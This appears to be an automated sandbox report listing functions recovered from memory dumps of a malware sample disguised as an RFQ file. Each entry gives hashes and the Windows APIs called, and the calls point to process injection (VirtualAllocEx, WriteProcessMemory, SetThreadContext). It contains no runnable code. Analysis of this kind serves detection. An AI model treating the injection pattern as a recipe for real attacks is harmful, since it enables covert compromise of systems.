Function 074A94A0 Relevance: 1.6, APIs: 1, Instructions: 138threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 074A9557

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c7f779a5450dba41c28ea7cfbb00f962d7a7579bcdcce40928c0b578c0510e51
Instruction ID: 35f3da4e4b31fa942132714a7f564b2eb41d953c7df2200db394c795d2ffee27
Opcode Fuzzy Hash: c7f779a5450dba41c28ea7cfbb00f962d7a7579bcdcce40928c0b578c0510e51
Instruction Fuzzy Hash: CB51DEB5D05219DFCB04DFA9D981AEEBBF1FB89310F24802AE419B7210D738AA45CF54

Function 074AA1D8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 074AA2AB

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5397171883c8af4cab4c04a55701df1ca448e27364217fbcc174932f9bfb912b
Instruction ID: b442d2bf5bcc5f8b6f250efdd4a49eed56dbadd956c4869063aade9d05dc9365
Opcode Fuzzy Hash: 5397171883c8af4cab4c04a55701df1ca448e27364217fbcc174932f9bfb912b
Instruction Fuzzy Hash: 9F41AAB5D012589FCF00CFA9D984ADEFBF1BB49310F24942AE819B7210D739AA45CF64

Function 074A9AF9 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074A9BAA

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c556a4b7363db5d46044ec24841dedbf2e93b6384eb8aa3c2e630c2814c17213
Instruction ID: 202079e6152c4782395c4759d1a8b6182c42bbabae62abe389273d4c2a91b7fa
Opcode Fuzzy Hash: c556a4b7363db5d46044ec24841dedbf2e93b6384eb8aa3c2e630c2814c17213
Instruction Fuzzy Hash: 22319AB9D042589FCF14CFA9D980ADEFBB1FB59320F10942AE815B7210D735A945CF54

Function 074A9B00 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074A9BAA

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 886f030089bc1ccbf1f0a2a24a4cfad2c3aa7448cc230186df59424c3c513e0e
Instruction ID: fd7617439c04f0da3b6e0a11b5119d0391e4cbe6c92774eaf86b99586d333d07
Opcode Fuzzy Hash: 886f030089bc1ccbf1f0a2a24a4cfad2c3aa7448cc230186df59424c3c513e0e
Instruction Fuzzy Hash: 123189B9D002589FCF14CFA9D980ADEFBB1FB59310F10942AE815B7210D735A945CF58

Function 09874CA8 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?), ref: 09874D9A

Memory Dump Source

Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f06122e3e617829a38bad4d11aec0a643642ee1cdfdbd6cba40bd558c2d92061
Instruction ID: 69597e366ab0bc709d5333a41f745aff660cc366250b2432544b4a33ad9933d8
Opcode Fuzzy Hash: f06122e3e617829a38bad4d11aec0a643642ee1cdfdbd6cba40bd558c2d92061
Instruction Fuzzy Hash: CB41EDB4D052089FCB14CFA8D881AEDFFF1AF59310F14806AE844A7320C7369A46DF54

Function 09B6E838 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 09B6E8DC

Memory Dump Source

Source File: 00000003.00000002.2045922427.0000000009B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b60000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0e8a60e38676f8118331c67565f2711887da494644bc8b6d6f10a078cbb96192
Instruction ID: e4d69fa2e9e6c616920ab6f636afda06696a244a0ccec917e40f66e333406749
Opcode Fuzzy Hash: 0e8a60e38676f8118331c67565f2711887da494644bc8b6d6f10a078cbb96192
Instruction Fuzzy Hash: 4331A8B9D012589FCB14CFA9D984A9EFBB0AF49320F20902AE818B7210D735A9458F54

Function 074A94A8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 074A9557

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d4c81428e352ec872dc5d4d4849c48bd2868f42a6fbdc5044604b4c110dccf74
Instruction ID: a4f1f163b3fd8127b5e04654ff95e193b93cd0b8bf76ede8d0c7792197d35cb8
Opcode Fuzzy Hash: d4c81428e352ec872dc5d4d4849c48bd2868f42a6fbdc5044604b4c110dccf74
Instruction Fuzzy Hash: 0D31BBB5D012589FCB14DFAAD985AEEFBF0BF49310F24842AE419B7200D738A985CF54

Function 09874D00 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?), ref: 09874D9A

Memory Dump Source

Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: da29a1f64ace703f7fa85f49dcfe4de00186607309e3c5ad4478133afb5df736
Instruction ID: 4358cddaeda837d87f5bd8a4251cd3b8e3e4892265492921b5b6387e96cf63b1
Opcode Fuzzy Hash: da29a1f64ace703f7fa85f49dcfe4de00186607309e3c5ad4478133afb5df736
Instruction Fuzzy Hash: 7931B8B5D012589FCB14CFA9D980AEEFBF1AF4A320F24942AE855B7210C735A945CF94

Function 09874D08 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?), ref: 09874D9A

Memory Dump Source

Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 84271d2585261df71a35401d0b51550d8aed1c999b04027e7e0de6f32391f18e
Instruction ID: 76b455bbd593c0548c1beccb05a9ffee0f420ec8fe157f82ae3c69ec62513dbe
Opcode Fuzzy Hash: 84271d2585261df71a35401d0b51550d8aed1c999b04027e7e0de6f32391f18e
Instruction Fuzzy Hash: 3531A9B5D012589FCB10CFA9D984AEEFBF5AB49320F24942AE855B7210C734A945CFA4

Function 09A2B240 Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

, xrefs: 09A2B283

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 456dbc6aa2f46bc02140288c3d134e770a87c017a79c0e29de04e80adbb252bd
Instruction ID: 687f5976908ce5f3e14a6e7012946b30cf11f2afaba092759ae4a890785ed613
Opcode Fuzzy Hash: 456dbc6aa2f46bc02140288c3d134e770a87c017a79c0e29de04e80adbb252bd
Instruction Fuzzy Hash: A1C1F970D09219CFDB50CF99D244BEEBBF6FB46744F249029D429AB250C3785985CFA1

Function 0993A7B0 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

(bq, xrefs: 0993AA64

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: dd7cf517454bec1e1b7e6d63045d85de9da1ec2ea9aaba4041c576a37810dfce
Instruction ID: d4abbccb573dde654ac2060f84ae0f6e1ac546c3e22f5220b74980b29dcb27e4
Opcode Fuzzy Hash: dd7cf517454bec1e1b7e6d63045d85de9da1ec2ea9aaba4041c576a37810dfce
Instruction Fuzzy Hash: 9CA19F31301240AFD7169F68D854A2A7BB7EF89310F15C5A9E6458F3B2CB32EC46DB51

Function 09A2B230 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

, xrefs: 09A2B283

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8c26a6f4cc8e3648d02361c30527e97798debb887b1c53253d097e0bda5704a0
Instruction ID: f3a2ec8e771e3b8a18562e77b7207322a245ab189fc4ed002e030e5d411fea09
Opcode Fuzzy Hash: 8c26a6f4cc8e3648d02361c30527e97798debb887b1c53253d097e0bda5704a0
Instruction Fuzzy Hash: 4DB109B0D09219CFDB50CF99D148BEEBBF6FB46744F249029D429AB290C3785985CFA1

Function 09A28A81 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

@, xrefs: 09A28D41

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 702ec80749894227f356c0ae66e45d2e8c435d9192527a080e95348717161ee8
Instruction ID: 1b859175b5ea949b7939187fcae9cc2e9e7249163b2a6464f9fa464e5d790faa
Opcode Fuzzy Hash: 702ec80749894227f356c0ae66e45d2e8c435d9192527a080e95348717161ee8
Instruction Fuzzy Hash: D7D1D274A05268DFDB60DF68D884B9ABBB2FB49304F0480DAE90DA7354DB345E85CF51

Function 09949E96 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

4k{, xrefs: 09949F2E

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4k{
API String ID: 0-2946010290
Opcode ID: d4afd677775e7549e1c28b4332b4f5b341844140fde2537aad5eab9d777366dc
Instruction ID: ee523b13ebdc3da39dc1d365b01e8b73c8b7faf7705a35d6ee338ec518f87ad5
Opcode Fuzzy Hash: d4afd677775e7549e1c28b4332b4f5b341844140fde2537aad5eab9d777366dc
Instruction Fuzzy Hash: 17915970E4A248DFCF46CFA8D484AAEBBB6EF59304F20842AE825AB354D7345D45CF51

Function 09935834 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

4'^q, xrefs: 09935A5A

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 68cc014ad1c3c07986d4ef7ba0e1b8dfddd9c45414b1c0beb2af91f7fa5d5e31
Instruction ID: bc9f9b22b03922a9db07ae82a72691faecb04c831dddc18addeabebad5c07dbb
Opcode Fuzzy Hash: 68cc014ad1c3c07986d4ef7ba0e1b8dfddd9c45414b1c0beb2af91f7fa5d5e31
Instruction Fuzzy Hash: FAA1FE34A10518DFCB04DFA4D894AADB7B2FF89300F95D159E40AAB365DB71EC42CB91

Function 0993EF50 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

(bq, xrefs: 0993F0E9

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 561d2cdbb2357d5fb9ffa0f44e386a4c61da6aa786f1242e545c63ee76c68d5a
Instruction ID: 0c84bf5585301f11acd8324102285ed9931f159dea0309957b17ecc4389237f2
Opcode Fuzzy Hash: 561d2cdbb2357d5fb9ffa0f44e386a4c61da6aa786f1242e545c63ee76c68d5a
Instruction Fuzzy Hash: BF716630E006099FDB14DFA9D9806AEBBF7BFC8300F64C569E549A7354DB31AE058B91

Function 09A28B89 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

@, xrefs: 09A28D41

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: adae14d9e792258261ed0b6ecb5ce3586090b238f3c78e5085434d52268ac3bf
Instruction ID: 2b1e38ac252aa9368c6cece875da197d6b48a6368ac4389b7db8b515300af359
Opcode Fuzzy Hash: adae14d9e792258261ed0b6ecb5ce3586090b238f3c78e5085434d52268ac3bf
Instruction Fuzzy Hash: 41B1D274E05268CFDB60DF68D884B9ABBB2FB49304F1480DAEA09A7354DB345E85CF51

Function 0993DB70 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

(bq, xrefs: 0993E148

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 01fb4c7090a4875bc085860c765f913e2380049e26a39bbc1a3c87150ce850dc
Instruction ID: f95d30de8a93cc4cd0696b83e706d843dbe025257a6a7a51d5df8974654bbd93
Opcode Fuzzy Hash: 01fb4c7090a4875bc085860c765f913e2380049e26a39bbc1a3c87150ce850dc
Instruction Fuzzy Hash: 3A71A0317042918FDB359F38C068B29BBE6ABD5310B69C569E49ACB6E2CF31EC41C745

Function 09A28B87 Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

@, xrefs: 09A28D41

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 90a9f1fdbb2e2bdd6a66d50d08b5c77bf33d3ab46fc7a8a0f6869f34d9de3d0a
Instruction ID: b26a301727adc09b4ce285fb0572c2aa4b23dcd14b40d9bc04aed707dd4c6552
Opcode Fuzzy Hash: 90a9f1fdbb2e2bdd6a66d50d08b5c77bf33d3ab46fc7a8a0f6869f34d9de3d0a
Instruction Fuzzy Hash: 48A1D374E05268DFDB60CF68D884B9AB7B2FB49304F0480DAEA09A7354DB345E85CF51

Function 09A28BFD Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

@, xrefs: 09A28D41

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 95f0abf7979652ecad411ab6a81792de7f923d3592487686bf1fb1a6eee6e5e6
Instruction ID: bcb4373688d8dee881b81c3a78d6cf764b896c4efc2d7bd3d47476fe199e1d2e
Opcode Fuzzy Hash: 95f0abf7979652ecad411ab6a81792de7f923d3592487686bf1fb1a6eee6e5e6
Instruction Fuzzy Hash: 4CA1D374E05268DFDB60DF68D884B9AB7B2FB49304F0480DAEA09A7354DB345E85CF51

Function 09942BF9 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

TJcq, xrefs: 09942D0D

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: e0e97c0084689308687f9ed63cc01a99386f54ddf9c44f1b7a62cf3fb76e02f0
Instruction ID: 54ead9cc7cf520deb0232aaddda827e14197dcfbef5b9349515f73c4144659d9
Opcode Fuzzy Hash: e0e97c0084689308687f9ed63cc01a99386f54ddf9c44f1b7a62cf3fb76e02f0
Instruction Fuzzy Hash: AC7148B4E012489FDB45DFA8D488AAEBBF7FF89308F208029E515A7358DB345946CF51

Function 09942C08 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

TJcq, xrefs: 09942D0D

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: d538dc2ddcaad795f01613f0bfdf8dc561ea6007304c478b00bb4c6aade7c010
Instruction ID: dcb0319d77fa000760fd4b99d13666c47562ccdc692e5f1703fe0b0d70118d3c
Opcode Fuzzy Hash: d538dc2ddcaad795f01613f0bfdf8dc561ea6007304c478b00bb4c6aade7c010
Instruction Fuzzy Hash: 387147B4E012489FDB45DFA8D488AAEBBF7FB8D304F208029E915A7358DB345946CF51

Function 099394E8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'^q, xrefs: 09939522

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: e035c5581bb639b2b54dde8a8551c8bbd21ea017b61c3a0b913d5b8d9dd69d3f
Instruction ID: e9ff90772f55115d664eaa19b6c59e86d0f03aa131c417f7d8d648e3c7764ba3
Opcode Fuzzy Hash: e035c5581bb639b2b54dde8a8551c8bbd21ea017b61c3a0b913d5b8d9dd69d3f
Instruction Fuzzy Hash: 01415E34B106149FCB14AF68C464BAE77ABAFCD700F91D429E40B9B394CF759C468B92

Function 09DAF698 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

0{, xrefs: 09DAF795

Memory Dump Source

Source File: 00000003.00000002.2046510988.0000000009D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9d90000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 0{
API String ID: 0-3122920575
Opcode ID: bd6abaaa8a9e31447acb613554c35bc8468796a940c6c708b86aca69acd6cfa2
Instruction ID: 3a42a4af8d8cf8198f1584514d8ca6cdd8ba7eb9805e34935ea1274e7480a685
Opcode Fuzzy Hash: bd6abaaa8a9e31447acb613554c35bc8468796a940c6c708b86aca69acd6cfa2
Instruction Fuzzy Hash: 83517574E02208AFDB04DFA9D589AADBBF2FB89304F18D069D915AB360CB346945CF51

Function 05189405 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

8yrq, xrefs: 0518949C

Memory Dump Source

Source File: 00000003.00000002.2010595252.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5180000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 8yrq
API String ID: 0-1978664531
Opcode ID: bb7dc9a759d77a1b004d421a8d9690e873ff9233c1de4208a7ceb9189a26f6df
Instruction ID: e2ed74e2297e3d3f55b7a369c45fbc0f64c74e4ddeac630106bf55677aba6513
Opcode Fuzzy Hash: bb7dc9a759d77a1b004d421a8d9690e873ff9233c1de4208a7ceb9189a26f6df
Instruction Fuzzy Hash: 6531E22154E7D45FD713AB3899751AA7F71AE5321470A14DBC0C0CF0B7D6588C4DCBAA

Function 09A275A1 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,, xrefs: 09A276AB

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: c4221f915af8db67abb8d42cc78e33f6d233eba87cd885c3ef785f8413e857cd
Instruction ID: d4e1dc667854f41150298595e5b88a672fa3a86396e2b95977e85c3a28945828
Opcode Fuzzy Hash: c4221f915af8db67abb8d42cc78e33f6d233eba87cd885c3ef785f8413e857cd
Instruction Fuzzy Hash: 5341D574A05228CFDB10CFA8D544BAEBBF2FB49714F109099D549A7340CB75AE85CF15

Function 09B6F970 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 09B6FA0F

Memory Dump Source

Source File: 00000003.00000002.2045922427.0000000009B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b60000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c38b85beb40edcb6f8900b1070f24790b12aee7c01aec71c967b2d5c905457d7
Instruction ID: d9a187da534facfb0053add68acff61f60d4f008c63abdec9e4429172294b4ca
Opcode Fuzzy Hash: c38b85beb40edcb6f8900b1070f24790b12aee7c01aec71c967b2d5c905457d7
Instruction Fuzzy Hash: 8031A9B5D002589FCB14CFA9D880AEEFBB0EB49320F14902AE814B7210D734A945CF94

Function 09934CB0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

4'^q, xrefs: 09934CF9

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: a3ec0233c26511f69ab957dcae31efd3b0762f4ce84d50c8b0654b1df1f43970
Instruction ID: 508c5361cfaa2e3a84d2d9dfb8d41c15c925e5d434590d7994d5d00e7b6abcf2
Opcode Fuzzy Hash: a3ec0233c26511f69ab957dcae31efd3b0762f4ce84d50c8b0654b1df1f43970
Instruction Fuzzy Hash: 6C21A235A001149FCF198FA4C844A59BBB7EF8D310F1584A9EA099B371CA31EC56CB91

Function 09934CC0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

4'^q, xrefs: 09934CF9

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 897060373270be5e109dde7b5dc4ef789f3937c5ae1968783bbd8439e53a9d69
Instruction ID: e0db636f4223afa505e2d945f06a09c67a81b49fa15b2ff44ed36a82de7f847c
Opcode Fuzzy Hash: 897060373270be5e109dde7b5dc4ef789f3937c5ae1968783bbd8439e53a9d69
Instruction Fuzzy Hash: 7A2180357001149FCF188F95D844A5DBBB7EF8D310F1580A9EA059B375CA31EC56CB91

Function 099394D9 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'^q, xrefs: 09939522

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: afdfeb8ca8ec8efbc71451a5fe8aee257a6e4b90f5dc2d94ea7656e91af3354c
Instruction ID: fb188fa18c38bfadd7378f1ff18a2691c26b4bea60bbe02a620e9a88605f70e8
Opcode Fuzzy Hash: afdfeb8ca8ec8efbc71451a5fe8aee257a6e4b90f5dc2d94ea7656e91af3354c
Instruction Fuzzy Hash: AC215030B002549BCB18AF6984547BEBBABAFC9704F958029E40BDB394CF759C068B91

Function 07CA1E3C Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07CA1EF9

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: fc5f522c197c8eee7672a15b48f5d9650787a2f1277e73c335ba1ced72652b23
Instruction ID: d1ccccf2fd5fbc88c6606bf23e5e54797af570524eab85569c1f2f9bbe79e8e8
Opcode Fuzzy Hash: fc5f522c197c8eee7672a15b48f5d9650787a2f1277e73c335ba1ced72652b23
Instruction Fuzzy Hash: 9921E7B0B0024FEFCB14DF69C88466A77F6FF85256F18806AD904CB220E735CA81C791

Function 09A2E298 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

;{, xrefs: 09A2E2E6

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: ;{
API String ID: 0-3061191582
Opcode ID: 4bdd406c1352f0a6eca0f026d9f4c25a5636f433e8b80c75c5c0881dcb6b0f01
Instruction ID: 02aca5ff68c7874402f2403b435f19d15891d6639f43d7963a1f6bd4c24b582a
Opcode Fuzzy Hash: 4bdd406c1352f0a6eca0f026d9f4c25a5636f433e8b80c75c5c0881dcb6b0f01
Instruction Fuzzy Hash: C6217C74A0421A9FCF40DFACD5456AEBBF6EF89304F208129D505A7398DB306D46CFA2

Function 07CA02A5 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07CA0355

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: d5211c6ed572a9c50f49040c8427dd2b097740a999a2a5fbf9268bfce11b438b
Instruction ID: 3737bdc9981a077558660d91d76e16f2f51e770420878a257a57f404a0782f30
Opcode Fuzzy Hash: d5211c6ed572a9c50f49040c8427dd2b097740a999a2a5fbf9268bfce11b438b
